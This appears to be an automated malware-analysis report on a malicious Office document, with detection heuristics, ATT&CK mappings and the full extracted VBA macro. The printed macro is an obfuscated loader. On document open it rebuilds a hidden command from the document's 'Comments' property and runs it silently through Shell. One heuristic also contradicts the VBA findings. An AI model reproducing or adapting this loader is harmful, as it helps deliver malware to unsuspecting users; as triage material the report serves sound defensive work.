Verdict: MALICIOUS
Risk Score: 212

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The AutoOpen macro is present and triggers the execution of a Shell() command, which in turn references PowerShell. This indicates the document is designed to download and execute a secondary payload. The ClamAV detection name 'Doc.Macro.DollarShell-6346616-0' further supports this analysis.
Heuristics (8)

- ClamAV: Doc.Macro.DollarShell-6346616-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched lines in script:
    aBYsbtnzr = wKTVbW + skSkapXRiA + zuiVozHNME
    VBA.Shell$ aBYsbtnzr, 0
    End Sub
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script:
    End Sub
    Sub AutoOpen()
    PinjEEHiY
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8542 bytes |

SHA-256: a9d608a226b560f4fcd0829005947a79efdced6f688c2a884428e875235c0f85

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 53 of 85 identifiers look randomly generated (e.g. 'jjHjqGFFpkh'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub PinjEEHiY()
jjHjqGFFpkh = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7400, 53)
RDcwVJIQWYI = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 8122), 56)
GUzrRbJd = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 12952), 58)
XBOoVJ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8757, 88)
MhtCsoCcsz = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10381), 143)
HzYQAl = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7748, 187)
FzHVnHAmvd = jjHjqGFFpkh + RDcwVJIQWYI + GUzrRbJd + XBOoVJ + MhtCsoCcsz + HzYQAl
LooiMwhF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2105, 91)
wojDWSGq = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8848, 127)
CiFVWKYK = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 8224), 7)
viwKu = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7575), 35)
XiRrkhTIh = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 216), 122)
iUpmE = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 5669), 104)
ciTLBZXl = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 4461), 73)
PrZILnjLL = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12249, 108)
AmMpGUf = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 4304), 61)
IiWmRc = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 17586, 112)
csTzMl = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8680, 41)
iuShGatnFb = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 16282), 97)
WvEskH = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10671, 195)
UmribYiST = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10556), 66)
ASzcaNTGil = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 1809), 134)
pjDohnbOF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11521, 181)
VrDjFi = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10917), 199)
UlnuoXTi = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 2533), 37)
ArwlFBB = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1488, 88)
BfsEipKdk = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 15109), 53)
OYqLPvCm = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7183, 131)
OJwzFUJ = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 2707), 151)
ChhwqvbjFF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8434, 184)
jHBDcBnWKwP = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 14813), 180)
mVvHdUA = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6159), 83)
UvjZzQnOwjk = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6992), 128)
BvudTWNbD = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 4686), 50)
fEZjZcli = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 13631), 192)
nFWCCXjwC = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 16714, 187)
vHUAMAAd = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11289), 129)
QdItvrGo = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6847), 107)
GXuOpYaRzif = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 6557), 31)
AjwEfMckA = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 15839), 78)
WbOIHf = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 13557), 42)
hoRYMF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13328, 25)
ZjiDrOuHJw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1001, 153)
csKGFjrN = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14039, 51)
KTBXTuj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3053, 106)
wVXCBVOWH = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 18177), 27)
zItBf = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 4276), 177)
KSjOziHY = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13127, 93)
vazUa = FzHVnHAmvd + LooiMwhF + wojDWSGq + CiFVWKYK + viwKu + XiRrkhTIh + iUpmE + ciTLBZXl + PrZILnjLL + AmMpGUf + IiWmRc + csTzMl + iuShGatnFb + WvEskH + UmribYiST + ASzcaNTGil + pjDohnbOF + VrDjFi + UlnuoXTi + ArwlFBB + BfsEipKdk + OYqLPvCm + OJwzFUJ + ChhwqvbjFF + jHBDcBnWKwP + mVvHdUA + UvjZzQnOwjk + BvudTWNbD + fEZjZcli + nFWCCXjwC + vHUAMAAd + QdItvrGo + GXuOpYaRzif + AjwEfMckA + WbOIHf + hoRYMF + ZjiDrOuHJw + csKGFjrN + KTBXTuj + wVXCBVOWH + zItBf + KSjOziHY
QapXlAbQi = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10124, 56)
LChLu = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9937, 36)
iGWwVRHT = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 10052), 15)
izwTfFH = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 18212, 47)
FZMbw = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 5959), 77)
ziDNPEnAw = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 15403), 190)
SFXPRv = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12513, 102)
lBljzaspbA = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 12663), 125)
azmUYQrBZ = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11795), 184)
WNzoMhpHRRK = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 673), 174)
MCFmWPLzf = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4696, 103)
STDqADIMb = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5879, 57)
IWLFi = vazUa + QapXlAbQi + LChLu + iGWwVRHT + izwTfFH + FZMbw + ziDNPEnAw + SFXPRv + lBljzaspbA + azmUYQrBZ + WNzoMhpHRRK + MCFmWPLzf + STDqADIMb
qbPWtdwHOIz = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 15774), 33)
zkFAqHYGf = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 9183), 40)
jOvUpwi = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 16161, 25)
EXrkPmio = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 12955), 2)
KlFEoDZs = IWLFi + qbPWtdwHOIz + zkFAqHYGf + jOvUpwi + EXrkPmio
pihdSPdwKZZ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9579, 5)
lDckUuT = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 4010), 4)
okjjupwCM = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 16128), 4)
wKTVbW = KlFEoDZs + pihdSPdwKZZ + lDckUuT + okjjupwCM
skSkapXRiA = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 17115), 1)
zuiVozHNME = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 614, 1)
aBYsbtnzr = wKTVbW + skSkapXRiA + zuiVozHNME
VBA.Shell$ aBYsbtnzr, 0
End Sub
Sub AutoOpen()
PinjEEHiY
End Sub